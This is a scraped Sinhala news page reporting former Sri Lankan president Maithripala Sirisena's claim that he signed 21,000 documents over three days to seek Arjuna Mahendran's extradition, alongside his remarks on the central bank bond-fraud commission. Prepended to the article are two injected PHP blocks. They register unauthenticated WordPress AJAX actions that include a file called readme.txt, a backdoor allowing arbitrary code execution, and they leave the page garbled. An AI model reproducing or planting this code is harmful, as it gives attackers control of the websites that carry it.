if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මහේන්ද‍්‍රන් ගේන්න මං අත්සන් 21,000ක් දින තුනක් තිස්සේ ගැහුවා.. මගේ ඇගිල්ලක් ගෙවුනා..- හිටපු ජනපති - mediahumanrights.lk
mediahumanrights.lk
News Political

මහේන්ද‍්‍රන් ගේන්න මං අත්සන් 21,000ක් දින තුනක් තිස්සේ ගැහුවා.. මගේ ඇගිල්ලක් ගෙවුනා..- හිටපු ජනපති

මහබැංකුවේ හිටපු අධිපති අර්ජුන් මහේන්ද්‍රන් සිංගප්පුරුවේ සිට මෙරටට ගෙන්වා ගැනිම සදහා නීතීපතිවරයා විසින් සකස් කරන ලද ලිපි ලේඛන සදහා රාජ්‍ය නායකයා ලෙස තමාට දින තුනක් තිස්සේ ඊට අත්සන් විසිඑක්දාහක් ගැසිමට සිදු වු බව හිටපු ජනාධිපති මෛත‍්‍රිපාල සිරිසේන මහතා පලවෙනිදා පොළොන්නරුව ප‍්‍රදේශයේ පැවති විශේෂ මාධ්‍ය සාකච්ඡාවකදි ප‍්‍රකාශ කලේය.

හිටපු අගමැතිවරයා විසින් මහබැංකුවේ අධිපති ලෙස සිංගප්පුරු ජාතිකයෙකු වන අර්ජුන් මහේන්ද්‍රන් මහතා පත් කිරිමේදි තමා ඊට දැඩි විරෝධය පලකල බවත් ආණ්ඩුව පිහිටුවා සති දෙකක් වැනි කාලයක් නිසා අගමැතිවරයාත් ජනාධිපතිවරයාත් අතර අර්බුදයක් හදාගත නොහැකි නිසා අගමැතිවරයාගේ ඉල්ලිම පරිදි දැඩි අකමැත්තකින් අර්ජුන් මහේන්ද්‍රන් මහබැංකුවේ අධිපතිවරයා ලෙස පත් කිරිමට තමා කැමැත්ත පලකල බවද මෛත‍්‍රිපාල සිරිසේන මහතා පැවසිය.

පොළොන්නරුව ශ‍්‍රි ලංකා නිදහස් පක්ෂ කාර්යාලයේ පැවති මාධ්‍ය සාකච්ඡුාවේදි වැඩිදුරටත් මාධ්‍යවේදින් අමතා කතා කල හිටපු ජනාධිපති මෛත‍්‍රිපාල සිරිසේන මහතා මෙසේද කිය.

‘මහබැංකුවේ සිදුව ඇති වංචාවන් සම්බන්ධයෙන් මා විසින් පත්කරන ලද ජනාධිපති කොමිසන් සභාව ඉතා සාර්ථකව ඒ කටයුතු කරගෙන ගියා.මම දන්න විදිහට මගේ දේශපාලන ජිවිතය තුල නිදහසෙන් පසු ලංකාවේ එක් එක් ආණ්ඩු විසින් පත්කරන ලද ජනාධිපති කොමිසම් සභාවලින් මහබැංකු මුල්‍ය වංචා සෙවිමට මම පත් කරපු ජනාධිපති කොමිසම තරම් රටේ මහජනතාව අතරත් උගතුන් බුද්ධිමතුන් සහ මාධ්‍ය තුලත් මේ තරම් කොමිසම් සභාවක් නැති තරම්. ඒ නිසා ජේ.ආර්.

ජයවර්ධන මහතාගේ ඉදලා ජනාධිපතිවරු මේ වෙනකල් පත් කරපු කොමිසම් සභා වලට මා පත් කෙරු කොමිසම් සභාවට ඉහලම ගෞරවයක් හිමි උනා. ඒ මහබැංකු වංචාව පිලිබද ජනාධිපති කොමිසම් සභා වාර්තාව මට භාර දුන්නා. ඊට පස්සේ බැදුම්කර වාර්ථාව පාර්ලිමේන්තුවට ඉදිරිපත් කරලා සභාගත කරන්නත් ක‍්‍රියාකලා.

අදත් ඒ වාර්ථාව අන්තර්ජාලයේ තියනවා. ඊට පස්සේ මේ කොමිසම් සභා වාර්ථාව මම භාර දුන්නා නීතීපති දෙපාර්තමේන්තුවටත්, අල්ලස් හා දුෂණ විමර්ශණ කොමිසමට , අපරාධ විමර්ශණ දෙපාර්තමේන්තුවටත් ඒවා මම භාර දුන්නා. ඊට පස්සේ ඒ ආයතන ඉතාම හොදින් ඒ පරික්ෂණ කටයුතු කරගෙන ගියා. ඒ වාර්ථාවේ නිර්දේශ කරලා තියනවා මේ වංචාවන් හොයන්න වෝ්හාරික විඝණනයක් සිදු කරන්න කියලා.

මේ මහබැංකු වාර්ථාව අනුව උගතුන් බුද්ධිමතුන් හැම දෙනාටමත් අලූත් වචනයක් එකතුවුනේ මේ කොමිසන් සභා සිදු කරන ලද වෝහාරික විඝණන නිර්දේශයන් අනුව තමයි. ඒ සියලූ කොමිසම් සභා වර්ථාවන් 2017-12-30 වන දින ඉහත කී කොමිසම් සභා මට භාර දුන්නා.
(under the courtesy of lankacnews.com news web)

Related posts

අත්‍යාවශ්‍ය භාණ්ඩ ප්‍රවාහනයට වාහන සඳහා බලපත්‍ර ලබා දෙන්නැයි අගමැතිගෙන් උපදෙස්

Shiran Viraj

රටේ ආර්ථිකය කඩා වැටීම වැලැක්විය නොහැකියි…

Shiran Viraj

ලංකා ඉතිහාසයේ අමාරුම සති තුන ඇරඹුනා..- අගමැති මාධ්‍ය අමතයි…

Shiran Viraj